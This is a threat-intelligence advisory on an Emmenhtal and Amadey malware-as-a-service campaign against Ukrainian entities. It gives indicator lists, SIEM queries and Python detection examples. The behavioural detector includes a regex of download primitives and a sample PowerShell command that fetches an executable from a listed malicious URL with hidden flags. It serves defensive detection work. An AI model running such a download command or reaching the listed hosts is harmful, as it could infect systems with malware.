MaaS Operation Using Emmenhtal and Amadey Linked to Threats Against Ukrainian Entities

    Date: 07/18/2025

    Severity: Medium

    Summary

In early February 2025, a phishing campaign targeting Ukrainian entities used invoice- and billing-themed emails carrying compressed archives that contained obfuscated JavaScript files. The JavaScript launched PowerShell downloaders that installed SmokeLoader through the Emmenhtal loader. Further analysis found similar Emmenhtal samples hosted on GitHub that were not email-delivered; these instead deployed Amadey, which fetched custom payloads from public GitHub repositories. Taken together, this points to a broader Malware-as-a-Service (MaaS) operation built on Emmenhtal and Amadey, with public GitHub repositories serving as payload staging infrastructure.
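    The IOC queries further down only catch the infrastructure seen in this campaign; the delivery chain itself (script host launched from an extracted archive, spawning PowerShell that downloads a payload) is the more durable thing to alert on. The following is an added example, not code from Talos or Gurucul: a small scorer over process-creation events. Field names follow the Sysmon Event ID 1 convention (Image, ParentImage, CommandLine), the weights and thresholds are arbitrary choices for illustration, and the three events are constructed for this example rather than real telemetry.

```python
"""Behavioural detection for the delivery chain described above:
a script host (wscript.exe/cscript.exe) spawning PowerShell that
downloads something. Added example, not Talos's or Gurucul's code.
Event fields use Sysmon Event ID 1 names; the events are constructed."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
# Download primitives commonly used by PowerShell stagers
DOWNLOAD_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|"
    r"invoke-restmethod|start-bitstransfer|net\.webclient|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# Flags that hide or encode execution
EVASION_RE = re.compile(
    r"(-enc\w*\s|-w(indowstyle)?\s+hidden|-nop\b|-noni\b)", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def _image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons, urls) for one process-creation event.
    Only PowerShell children are scored; everything else scores 0."""
    image = _image_name(ev.get("Image", ""))
    parent = _image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image not in PS_HOSTS:
        return 0, [], []
    score, reasons = 0, []
    if parent in SCRIPT_HOSTS:
        score += 3
        reasons.append("powershell spawned by script host")
    if DOWNLOAD_RE.search(cmd):
        score += 2
        reasons.append("download primitive in command line")
    if EVASION_RE.search(cmd):
        score += 1
        reasons.append("hidden/encoded execution flag")
    urls = URL_RE.findall(cmd)
    if urls:
        score += 1
        reasons.append("URL in command line")
    return score, reasons, urls


def detect(events, threshold=4):
    """Return the events scoring at or above threshold (arbitrary cut-off),
    with the reasons and any URLs pulled from the command line."""
    hits = []
    for ev in events:
        score, reasons, urls = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["ProcessId"], "score": score,
                         "reasons": reasons, "urls": urls})
    return hits


# Constructed sample events (not real telemetry); the URL is the first IOC above
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\7-Zip\7zFM.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\AppData\Local\Temp\7zO4\invoice_2025.js"'},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://pivqmane.com/doc/fb.mp4','C:\\Users\\u\\AppData\\Local\\Temp\\fb.exe')\""},
    {"ProcessId": 5200, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

    Only the second event fires: PowerShell under wscript.exe, a WebClient download, hidden/no-profile flags and a URL. The benign scheduled script under explorer.exe scores zero, and the wscript.exe launch itself is not scored because the signal is in its child. The extracted URL can be fed straight into the URL IOC match below.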

    Indicators of Compromise (IOC) List

URL/Domain

    http://pivqmane.com/doc/fb.mp4

    http://pivqmane.com/testonload.mp4

    http://185.215.113.16/test/amnew.exe

    http://185.215.113.43/Zu7JuNko/index.php

    IP Address

    185.156.73.73

    185.215.113.209

    185.215.113.75

Hash (SHA-256; the first and fifth values below are 63 characters long as published and will not match a 64-character SHA-256 field)

    4e3951e668464efe8195d45fea7967857070a7d20d2c0e22f3c0f10bb2a8f8b

    87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

    718be762e8bd513283cd5e21634dc65bd160e47121716fd058daf5f3be42728a

    9bcfc98998b9e42b86204e66605b65462eeb8cfd8a0661b3ceebc99d4277e83c

    c62e7aca9bf6c20f7394d6d59b202af56150defbb6fae06e8443b7c6d71244d

    21cf7da02e01b3c2317178395eff873e50ab9b8f27a23ffed37b2efff8fd6b90

    35c1eb5ff8913c4ca4feb712e05354772146247bdb4b337868c687730f201023

    0334cd1b8ab17203179da1ae77c1fad97ddf794cc63a6048aca664956d10b2ca

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

Detection Query 1 :

url like "http://pivqmane.com/doc/fb.mp4" or siteurl like "http://pivqmane.com/doc/fb.mp4" or url like "http://pivqmane.com/testonload.mp4" or siteurl like "http://pivqmane.com/testonload.mp4" or url like "http://185.215.113.16/test/amnew.exe" or siteurl like "http://185.215.113.16/test/amnew.exe" or url like "http://185.215.113.43/Zu7JuNko/index.php" or siteurl like "http://185.215.113.43/Zu7JuNko/index.php" or domainname like "pivqmane.com"

(The domainname field is matched on the host name alone; a full URL never appears in it, so matching domainname against the complete URL would not fire.)

Detection Query 2 :

dstipaddress IN ("185.215.113.75","185.215.113.209","185.156.73.73","185.215.113.16","185.215.113.43") or srcipaddress IN ("185.215.113.75","185.215.113.209","185.156.73.73","185.215.113.16","185.215.113.43")

(185.215.113.16 and 185.215.113.43 are the IP hosts of the URL IOCs above; matching them at the IP layer covers connections that never produce a URL or domain log.)

    Detection Query 3 : 

    sha256hash IN ("21cf7da02e01b3c2317178395eff873e50ab9b8f27a23ffed37b2efff8fd6b90","87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f","4e3951e668464efe8195d45fea7967857070a7d20d2c0e22f3c0f10bb2a8f8b","718be762e8bd513283cd5e21634dc65bd160e47121716fd058daf5f3be42728a","9bcfc98998b9e42b86204e66605b65462eeb8cfd8a0661b3ceebc99d4277e83c","c62e7aca9bf6c20f7394d6d59b202af56150defbb6fae06e8443b7c6d71244d","35c1eb5ff8913c4ca4feb712e05354772146247bdb4b337868c687730f201023","0334cd1b8ab17203179da1ae77c1fad97ddf794cc63a6048aca664956d10b2ca")
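    Before pasting an IOC list into queries like the ones above, it pays to check each value against the field it will be matched in. The following is an added example, not Gurucul's or Talos's code: it takes the IOC list from this page, validates the hashes, derives host-level and IP-level indicators from the URL IOCs, emits one condition per field type, and evaluates the same logic against a few constructed log records. The field names (url, siteurl, domainname, dstipaddress, srcipaddress, sha256hash) mirror the queries above, the "like" semantics are assumed to be case-insensitive substring match, and the four records are constructed for the example.

```python
"""Sanity-check the IOC list above and build field-appropriate match
conditions. Added example, not Gurucul's or Talos's code. Field names
and 'like' semantics (case-insensitive substring) are assumptions;
the sample records are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

# IOCs copied from the list above
URL_IOCS = [
    "http://pivqmane.com/doc/fb.mp4",
    "http://pivqmane.com/testonload.mp4",
    "http://185.215.113.16/test/amnew.exe",
    "http://185.215.113.43/Zu7JuNko/index.php",
]
IP_IOCS = ["185.156.73.73", "185.215.113.209", "185.215.113.75"]
HASH_IOCS = [
    "4e3951e668464efe8195d45fea7967857070a7d20d2c0e22f3c0f10bb2a8f8b",
    "87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f",
    "718be762e8bd513283cd5e21634dc65bd160e47121716fd058daf5f3be42728a",
    "9bcfc98998b9e42b86204e66605b65462eeb8cfd8a0661b3ceebc99d4277e83c",
    "c62e7aca9bf6c20f7394d6d59b202af56150defbb6fae06e8443b7c6d71244d",
    "21cf7da02e01b3c2317178395eff873e50ab9b8f27a23ffed37b2efff8fd6b90",
    "35c1eb5ff8913c4ca4feb712e05354772146247bdb4b337868c687730f201023",
    "0334cd1b8ab17203179da1ae77c1fad97ddf794cc63a6048aca664956d10b2ca",
]
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def validate_hashes(hashes):
    """Separate well-formed SHA-256 values from ones that can never match
    an exact-equality hash field (wrong length or non-hex characters)."""
    ok, bad = [], []
    for h in hashes:
        h = h.strip().lower()
        (ok if SHA256_RE.match(h) else bad).append(h)
    return ok, bad


def split_urls(urls):
    """Derive host-level IOCs from URL IOCs: domain names belong in the
    domainname field, literal IP hosts join the IP address list."""
    domains, ips = set(), set()
    for u in urls:
        host = urlsplit(u).hostname
        try:
            ipaddress.ip_address(host)
            ips.add(host)
        except ValueError:
            domains.add(host)
    return sorted(domains), sorted(ips)


def build_queries(urls, ips, hashes):
    """One condition per field type, each holding only values that field can contain."""
    domains, url_ips = split_urls(urls)
    good_hashes, _ = validate_hashes(hashes)
    all_ips = sorted(set(ips) | set(url_ips))
    quoted = lambda vals: ",".join(f'"{v}"' for v in vals)
    return {
        "url": " or ".join(f'url like "{u}" or siteurl like "{u}"' for u in urls),
        "domain": " or ".join(f'domainname like "{d}"' for d in domains),
        "ip": f"dstipaddress IN ({quoted(all_ips)}) or srcipaddress IN ({quoted(all_ips)})",
        "hash": f"sha256hash IN ({quoted(good_hashes)})",
    }


def match_record(rec, urls=URL_IOCS, ips=IP_IOCS, hashes=HASH_IOCS):
    """Evaluate the same conditions against one log record (field -> value).
    Returns the names of the field groups that matched."""
    domains, url_ips = split_urls(urls)
    good_hashes, _ = validate_hashes(hashes)
    all_ips = set(ips) | set(url_ips)
    like = lambda field, vals: any(v.lower() in rec.get(field, "").lower() for v in vals)
    hits = []
    if like("url", urls) or like("siteurl", urls):
        hits.append("url")
    if like("domainname", domains):
        hits.append("domainname")
    if rec.get("dstipaddress") in all_ips or rec.get("srcipaddress") in all_ips:
        hits.append("ipaddress")
    if rec.get("sha256hash", "").lower() in good_hashes:
        hits.append("sha256hash")
    return hits


# Constructed records, one per telemetry type (not real logs)
SAMPLE_RECORDS = {
    "proxy": {"url": "http://pivqmane.com/doc/fb.mp4", "domainname": "pivqmane.com",
              "dstipaddress": "203.0.113.10"},
    "dns": {"domainname": "pivqmane.com"},
    "flow": {"srcipaddress": "10.0.0.5", "dstipaddress": "185.215.113.16"},
    "edr": {"sha256hash": HASH_IOCS[0].upper()},   # the 63-character value
}

if __name__ == "__main__":
    good, bad = validate_hashes(HASH_IOCS)
    print(f"{len(good)} usable SHA-256 values, {len(bad)} malformed: {bad}")
    for name, q in build_queries(URL_IOCS, IP_IOCS, HASH_IOCS).items():
        print(f"{name}: {q}")
    for name, rec in SAMPLE_RECORDS.items():
        print(name, "->", match_record(rec))
```

    Two of the eight hashes come out as malformed (63 characters), so the EDR record carrying one of them matches nothing; the DNS record, which has no URL field, is caught only by the host-level domainname clause; and the flow record is caught only because the URL hosts were folded into the IP list. A substring "like" on domainname will also match hosts such as a subdomain of pivqmane.com, which is usually what you want for infrastructure pivoting but is worth knowing when tuning.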

    Reference:    

    https://blog.talosintelligence.com/maas-operation-using-emmenhtal-and-amadey-linked-to-threats-against-ukrainian-entities/


Tags: Malware, SmokeLoader, Emmenhtal, Amadey, Ukraine, Phishing
